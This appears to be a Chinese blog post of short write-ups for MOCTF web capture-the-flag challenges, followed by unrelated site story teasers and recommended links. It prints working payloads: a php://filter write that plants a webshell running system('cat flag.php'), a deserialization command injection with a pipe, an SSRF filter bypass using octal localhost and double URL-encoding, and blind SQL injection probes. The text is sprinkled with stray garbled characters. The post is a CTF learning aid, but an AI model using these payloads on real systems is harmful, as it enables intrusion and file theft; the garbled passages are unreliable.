2019-04-19

MOCTF -WEB

9扛或、暴躁老板

抓包

10瘸彤、Flag在哪

抓取重定向

11佩脊、美味的餅干

發(fā)現(xiàn)cookie中存在base64編碼+md5編碼


改成admin并修改cookie即可

12验庙、沒時(shí)間解釋了

發(fā)現(xiàn)index2.php润梯,可能是重定向过牙。

13、死亡退出

參考地址:https://blog.csdn.net/stepone4ward/article/details/86651041

@file_put_contents($filename, $c);

在向tmp.php中寫入數(shù)據(jù)時(shí)利用php偽協(xié)議file=php://filter/read=convert.base64-decode/resource=tmp.php

c中寫入base64編碼的一句話<?php system("cat flag.php");?>

因?yàn)樽钋懊娴膒hpexit7位纺铭,因?yàn)閎ase64算法解碼時(shí)是4個(gè)byte一組寇钉,所以要加上一個(gè)a補(bǔ)全8位,

aPD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==

構(gòu)造post? ? file=php://filter/write=convert.base64-decode/resource=tmp.php&c=aPD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==

14舶赔、火眼金睛

交個(gè)腳本就行


15扫倡、unset

代碼審計(jì),估計(jì)要用到unset

unset(bar);用來銷毀指定的變量竟纳,如果變量bar);用來銷毀指定的變量撵溃,如果變量bar 包含在請求參數(shù)中,可能出現(xiàn)銷毀一些變量而實(shí)現(xiàn)程序邏輯繞過锥累。


要求key中不能出現(xiàn)flag,但是又要$_GET['flag']缘挑。。桶略。

所以利用

如果_POST语淘、_GET中的某一鍵值對(duì)已經(jīng)存在诲宇,就銷毀這個(gè)key-value,從而繞過waf()


再利用POST中的數(shù)組重新進(jìn)行鍵值對(duì)的賦值惶翻,因?yàn)镚ET中的鍵值對(duì)為$flag=s878926199a

而下面需要的是_GET[flag]

構(gòu)造? http://119.23.73.3:5101/?flag=s878926199a&daiker=s155964671a&file=php://filter/read=convert.base64-encode/resource=flag.php?

POST:????_GET[flag]=s878926199a&_GET[daiker]=s155964671a&_GET[file]=php://filter/read=convert.base64-encode/resource=flag.php

16姑蓝、PUNG

在學(xué)校那個(gè)頁面的源代碼中提示index.php.bak

下載

1、存在class.php吕粗,以及需要利用反序列化它掂。

試試class.php.bak文件

首先是_destruct(),waf()是啥不知道溯泣。虐秋。

如果weapon==="AWM",這里要繞過_wakeup垃沦,否則武器被賦值為98k客给,

調(diào)用Get_air_drops($this->bag);

然后????Get_air_drops($b)????是????$this->$b();

在調(diào)用不存在的方法時(shí)調(diào)用????_call()



很明顯要利用參數(shù)可控的

$file = explode(".",$method);

if(file_exists(".//class$file[0].php"))

已知????system("php .//class//win.php"); 存在

于是構(gòu)造????//win

system("php .//class//$method.php");

再利用管道符讀取flag

于是構(gòu)造"http://win.php | cat ./class/flag"

構(gòu)造反序列化


17、網(wǎng)站檢測

參考wp:https://blog.csdn.net/stepone4ward/article/details/86701123

試一下http://www.moctf.com

發(fā)現(xiàn)這個(gè)檢測器會(huì)將頁面的主要內(nèi)容輸出到屏幕肢簿,嘗試一下http://www.moctf.com/flag.php


SSRF漏洞(服務(wù)器端請求漏洞)是一種由攻擊者構(gòu)造形成由服務(wù)端發(fā)起請求的一個(gè)安全漏洞靶剑。因?yàn)槠涫怯煞?wù)器端發(fā)生的請求,所以可以訪問到外網(wǎng)無法訪問到的內(nèi)部系統(tǒng)池充。其繞過方式為在真實(shí)地址后加上@+想要偽造訪問的地址

這道題給出的hint為docker -p 10001:80

我們需要訪問的是本地的ip桩引,但是題目過濾了dot和127,因此對(duì)于dot我們采取url編碼的方式繞過收夸,但此時(shí)的“.”為%2e,依舊會(huì)被識(shí)別坑匠,此時(shí)我們需要使用url二次編碼來進(jìn)行繞過。對(duì)于127.0.0.1我們則采取改變進(jìn)制的方法進(jìn)行繞過卧惜。

SSRF厘灼,過濾了.和127

最基本的payload為:http://www.moctf.com@127.0.0.1/flag.php

可以利用url二次編碼的方式繞過.127.0.0.1可以用localhost試試,發(fā)現(xiàn)不行

將127.0.0.1轉(zhuǎn)為8進(jìn)制結(jié)果為017700000001

url=http%3A%2F%2Fwww.moctf.com@017700000001/%25%36%36%25%36%43%25%36%31%25%36%37%25%32%45%25%37%30%25%36%38%25%37%30

18、簡單注入

參考wp:http://www.reibang.com/p/4bf347959bd5

多次嘗試發(fā)現(xiàn)????id=1'and'1'='1????可以盲注了


判斷可用字符

利用相同方法帶入發(fā)現(xiàn)union聯(lián)合注入咽瓷、or设凹、<、>都不可用茅姜。

可以使用and闪朱、select查詢字符。

bool盲注,腳本以此類推

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末钻洒,一起剝皮案震驚了整個(gè)濱河市奋姿,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌航唆,老刑警劉巖胀蛮,帶你破解...
    沈念sama閱讀 218,525評(píng)論 6 507
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異糯钙,居然都是意外死亡粪狼,警方通過查閱死者的電腦和手機(jī)退腥,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,203評(píng)論 3 395
  • 文/潘曉璐 我一進(jìn)店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來再榄,“玉大人狡刘,你說我怎么就攤上這事±福” “怎么了嗅蔬?”我有些...
    開封第一講書人閱讀 164,862評(píng)論 0 354
  • 文/不壞的土叔 我叫張陵,是天一觀的道長疾就。 經(jīng)常有香客問我澜术,道長,這世上最難降的妖魔是什么猬腰? 我笑而不...
    開封第一講書人閱讀 58,728評(píng)論 1 294
  • 正文 為了忘掉前任鸟废,我火速辦了婚禮,結(jié)果婚禮上姑荷,老公的妹妹穿的比我還像新娘盒延。我一直安慰自己,他們只是感情好鼠冕,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,743評(píng)論 6 392
  • 文/花漫 我一把揭開白布添寺。 她就那樣靜靜地躺著,像睡著了一般懈费。 火紅的嫁衣襯著肌膚如雪计露。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 51,590評(píng)論 1 305
  • 那天楞捂,我揣著相機(jī)與錄音薄坏,去河邊找鬼。 笑死寨闹,一個(gè)胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的君账。 我是一名探鬼主播繁堡,決...
    沈念sama閱讀 40,330評(píng)論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼乡数!你這毒婦竟也來了椭蹄?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 39,244評(píng)論 0 276
  • 序言:老撾萬榮一對(duì)情侶失蹤净赴,失蹤者是張志新(化名)和其女友劉穎绳矩,沒想到半個(gè)月后,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體玖翅,經(jīng)...
    沈念sama閱讀 45,693評(píng)論 1 314
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡翼馆,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,885評(píng)論 3 336
  • 正文 我和宋清朗相戀三年割以,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片应媚。...
    茶點(diǎn)故事閱讀 40,001評(píng)論 1 348
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡严沥,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出中姜,到底是詐尸還是另有隱情消玄,我是刑警寧澤,帶...
    沈念sama閱讀 35,723評(píng)論 5 346
  • 正文 年R本政府宣布丢胚,位于F島的核電站翩瓜,受9級(jí)特大地震影響,放射性物質(zhì)發(fā)生泄漏携龟。R本人自食惡果不足惜奥溺,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,343評(píng)論 3 330
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望骨宠。 院中可真熱鬧浮定,春花似錦、人聲如沸层亿。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,919評(píng)論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽匿又。三九已至方灾,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間碌更,已是汗流浹背裕偿。 一陣腳步聲響...
    開封第一講書人閱讀 33,042評(píng)論 1 270
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留痛单,地道東北人嘿棘。 一個(gè)月前我還...
    沈念sama閱讀 48,191評(píng)論 3 370
  • 正文 我出身青樓,卻偏偏與公主長得像旭绒,于是被迫代替她去往敵國和親鸟妙。 傳聞我的和親對(duì)象是個(gè)殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 44,955評(píng)論 2 355

推薦閱讀更多精彩內(nèi)容

  • 1挥吵、什么是NFS重父? 全稱 network file system 網(wǎng)絡(luò)文件系統(tǒng) 通過網(wǎng)絡(luò)存儲(chǔ)和組織文件的一種方法或...
    Wave_e430閱讀 252評(píng)論 0 0
  • WEB2 看源代碼得flag 文件上傳測試 找一張圖片上傳,截包改后綴名為.php得flag 計(jì)算題 F12修改輸...
    a2dd56f6ad89閱讀 18,511評(píng)論 0 2
  • 面向?qū)ο螅汉苤匾模?1.類的概念: 類是對(duì)一組具有相同特征和行為的對(duì)象的抽象描述忽匈; 理解:1類包含了兩個(gè)要素:特...
    lookeverybody個(gè)雞閱讀 538評(píng)論 0 0
  • 初識(shí)張愛玲房午,是一部名為《傾城之戀》的電視劇。 那時(shí)尚且年幼丹允,只記得飾演白流蘇的陳數(shù)一度驚艷了少年時(shí)光郭厌。 高中時(shí)期袋倔,...
    哲思領(lǐng)讀閱讀 849評(píng)論 1 3
  • 風(fēng)在動(dòng)。 雨在飄沪曙。 車在轟鳴 時(shí)間在散發(fā)她獨(dú)有的香味奕污。 我本以為靜止可以留下她們 雨過天晴后發(fā)現(xiàn)被她們拋棄了 來不...
    方衛(wèi)明閱讀 268評(píng)論 0 0